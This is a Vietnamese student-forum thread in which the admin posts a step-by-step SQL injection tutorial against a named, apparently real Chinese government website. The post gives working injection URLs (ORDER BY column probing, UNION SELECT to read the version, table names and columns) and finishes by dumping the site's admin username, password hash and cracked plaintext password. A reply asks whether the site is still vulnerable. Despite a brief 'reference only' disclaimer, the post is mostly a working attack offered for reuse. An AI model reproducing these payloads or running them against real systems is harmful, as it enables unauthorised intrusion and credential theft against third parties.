Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừng Khách viếng thăm đến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!

Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM

Mỗi một thành viên là một viên gạch xây dựng diễn đàn
 
IndexCalendarTrợ giúpTìm kiếmĐăng kýĐăng NhậpPhotoshop  Online
News & Announcements
 Admin (200)
 lethuy_daotaoxaydung (157)
 solle bilo (86)
 nguyenhai777 (86)
 ĐàmDuyên (51)
 chaichai (31)
 phankalee (23)
 bucghe (20)
 cantlive (16)
 Black_Pig (12)
Hướng Dẫn Tạo Khung Chữ Ký Dưới Bài Viết
Du học Đài Loan - Học bổng 100% tại Trường đại học Kiến Quốc (Chienkuo Technology University)
Học Bổng Du Học Anh Ngành KINH DOANH, TÀI CHÍNH – KẾ TOÁN– MAKETING Trường LSBF London
Thủ thuật học bài tin học
Ngày Tết Truyền Thống Khác Lạ Của Người Do Thái
Hội Thảo Phỏng Vấn Trực Tiếp Cấp Học Bổng DU HỌC ANH - Kỳ Nhập Học 2014
[Volambisu.com] Khai mở Server Thanh Long 10h ngày 15/11-Đua Top nhận SamsungGALAXY
[Volambisu.com] Khai mở Server Thanh Long 10h ngày 15/11-Đua Top nhận SamsungGALAXY
HỘI THẢO DU HỌC ERC SINGAPORE - Chuyển Tiếp Tín Chỉ ĐH-CĐ Lấy Bằng ĐH Anh Quốc Chỉ Với 1 Năm Tại ERC, 16/11/2013
DU HỌC ANH - Phỏng Vấn Trực Tiếp 02/11 Với Đại Diện Trường Cấp Học Bổng Trường LSC, Chester, Anglia Ruskin University
Sân khấu chuyên nghiệp dành cho sự kiện
Nguyệt Nhãn Thông báo Open Alpha Test 10h00 ngày 12/10/2103
[ Nguyệt Nhãn ] Game võ hiệp 2.5D -- Tưng Bừng Event nhận GifCode khủng cho tân thủ
Học Lập trình web PHP - Cam kết 100% Thiết kế được website ngay trong khóa học
Cho thuê nhà bạt chuyên nghiệp dành chó sự kiện ngoài trời
Chữ ký số là gì ?
SOLLE BILO hãy lắng nghe..... nói và ......hi!
help me
mem mới
xd 09-12
kingkingpy  
duhocdailoangea  
prince_bolide  
prince_bolide  
xuanvuive2013  
Du_hoc_Newworld  
nguyenhai777  
nguyenhai777  
Du_hoc_Newworld  
Du_hoc_Newworld  
htkim1  
nguyenhai777  
nguyenhai777  
leupanh  
htkim1  
thanhvt1985  
Rùa  
Rùa  
Rùa  
Admin  

Hướng dẫn Hack Site lỗi SQLXem chủ đề cũ hơn Xem chủ đề mới hơn Go down
Mon Jan 02, 2012 4:55 pm
Trụ Cột Của Giúp Đỡ
avatar
4R HS Trường TCXD.TPHCM - Admin-
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 26
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Tài Sản
Huy Chương:
Profile Admin
Tổng số bài gửi : 200
Thanked : 79
Join date : 23/11/2011
Age : 26
Đến từ : Khu dân cư Gamer
Châm ngôn sống : Trụ Cột Của Giúp Đỡ
Comments : YH: honma_battri2000

Bài gửiTiêu đề: Hướng dẫn Hack Site lỗi SQL
http://tcxd.forumvi.com

Tiêu đề: Hướng dẫn Hack Site lỗi SQL

Bài hướng dẫn này là 1 site bị lỗi SQL.
Và xin nói trước mình chỉ hướng dẫn để các bạn biết thôi chứ ko nên quậy phá người ta nhé

Victim: http://ykzzb.gov.cn <= Site của Trung Quốc (sr các bạn nào là người TQ)

http://ykzzb.gov.cn/newsinfo.php?id=4033 <= chọn đại 1 mục bất kỳ nó ra như sau id=4033

ko có bị lỗi và hình demo đây



Tiếp theo ta tìm lỗi bằng cách thêm dấu " 4033' " hoặc dấu " -4033 ".
Nhớ để ý cái dấu nhé

http://ykzzb.gov.cn/newsinfo.php?id=-4033

và chữ mất bớt đi.
Bạn nên chú ý 2 hình nhé, đều cùng 1 site nhưng khác nhau chổ "id=4033" và "id=-4033"




Khi tìm được lỗi thì ta dùng câu lệnh ORDER BY 1-- -

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 1-- - <= site bình thường

Giải thích: 1-- là số cột đầu tiên để thăm dò lỗi
Dấu - đằng sau là tránh bị ghi log, bạn cũng có thể thay bằng tên cũng được.

vd: http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 1-- Martin™

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 10-- - <= site lỗi.
Cái chủ yếu của chúng ta là tìm ra những cột nào ko bị lỗi.
Ta Order 10 thì bị lỗi giờ ta lùi Order lại nhé


http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 9-- - <= site lỗi.

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 7-- - <= site lỗi.

http://ykzzb.gov.cn/newsinfo.php?id=-4033 order by 6-- - <= site bình thường.

=> vậy chúng ta có 6 cột ko bị lỗi
Giờ ta dùng lệnh UNIONSELECT để xem cột lỗi


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,2,3,4,5,6-- -

Sau khi làm xong câu lệnh và nhấn enter thì ta tìm được các cột cần lấy:
=> 6,2,5,3,4 (mình lấy theo thứ tự từ trên xuống)

demo ảnh:


Bước tiếp theo ta chọn đại 1 số để lấy VERSION SITE. Tớ chọn đại số 2 nhé.
Vẫn tại site đó nhưng ta dời trỏ chuột lại con số 2 và làm thao tác thế này


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,version(),3,4,5,6-- -

Xuất hiện version: 5.0.77. Ra Ver 5 thì dễ, ra Ver 4 thì khó à.
demo ảnh:


Tìm được Version giờ ta tìm TABLE_NAME:
Vẫn site cũ, các bạn chú ý xem câu lệnh nhé


http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- -

Tìm Version cột nào thì Table_name cột đó. Và kết quả là ta tìm được 1 đống cột chứ ADMIN

administrator,administrator77,administrator8,administrator9

cdb_access,cdb_activities,cdb_activityapplies,cdb_adminactions,cdb_admincustom,cdb_admingroups,cdb_adminnotes

cdb_adminsessions,cdb_advcaches,cdb_advertisements,cdb_announcements,cdb_attachments

cdb_attachpaymentlog,cdb_attachtypes,cdb_banned,cdb_bbcodes,cdb_buddys,cdb_caches,cdb_




Giờ ta lấy cột administrator

Câu lệnh tiếp theo các bạn cần làm là:

http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=0x61646d696e6973747261746f72-- -

Ta tìm được cột id và pass: id,uid,pwd,sdate

Lấy cái này: uid,pwd



0x61646d696e6973747261746f72 = 0xadministrator

Mình đã mã hoá từ administrator thành 61646d696e6973747261746f72

Tiếp theo ta lấy ID và PASS của ADMIN

http://ykzzb.gov.cn/newsinfo.php?id=-4033 UNION SELECT 1,group_concat(uid,0x2f,pwd),3,4,5,6 from administrator-- -

Lúc nảy ta tìm được cột administrator. Nên sau từ From ta trả nó về administrator
Và kết quả của chúng ta đây




ID: admin
Pass: 7fef6171469e80d32c0559f88b377245 (đã bị mã hoá).
Giải mã: 7fef6171469e80d32c0559f88b377245 = admin988
Dùng trang web sau giải mã http://md5decrypter.co.uk/


Kết thúc bài học hôm nay. Bài học chỉ mang tính chất tham khảo ko nên áp dụng cho việc đen tối.

Video Tut quay lại cách Hack Site. Các bạn xem nhé


----------------------------------------------------------The End----------------------------------------------------------

Tài Sản Của Admin
Tài Sản
Huy Chương:

Chữ Ký Của Admin

-------------------------------------------------------------------------------
Trụ Cột Của Forum


Mọi Thắc Từ Xin Liên Hệ Về Địa Chỉ Sau:
Gmail : Banquantri4r@gmail.com
Chào mừng bạn Khách viếng thăm đã đến với Forum Trường TCXD TPHCM!

Wed May 02, 2012 10:16 pm
Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống
4R HS Trường TCXD.TPHCM - nonebody-
Tổng số bài gửi : 2
Thanked : 0
Join date : 02/05/2012
Châm ngôn sống : Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống
Profile nonebody
Tổng số bài gửi : 2
Thanked : 0
Join date : 02/05/2012
Châm ngôn sống : Hãy yêu sách, sách là nguồn kiến thức vô tận. Chỉ có kiến thức mới là con đường sống

Bài gửiTiêu đề: Re: Hướng dẫn Hack Site lỗi SQL

Tiêu đề: Hướng dẫn Hack Site lỗi SQL

Sao e test thử hok đc nhỉ:( Site này fix chưa a?

Tài Sản Của nonebody
Chữ Ký Của nonebody


Hướng dẫn Hack Site lỗi SQL

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang
Trang 1 trong tổng số 1 trang
* Không dùng những ngôn từ thiếu lịch sự.
* Bài viết sưu tầm nên ghi rõ nguồn.
* Tránh spam nhảm không liên quan đến chủ đề.

Yêu cầu viết tiếng Việt có dấu.


Permissions in this forum:Bạn không có quyền trả lời bài viết
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM :: Khu Vực Dành Cho Dân I Tờ :: Khu Vực C.E.H-
Click ChatBox Ver 2 [?] - Online [?]
frontpage stats
Designer By Martin™
Forumotion.com | © phpBB | Free forum support | Liên hệ | Report an abuse | Create a blog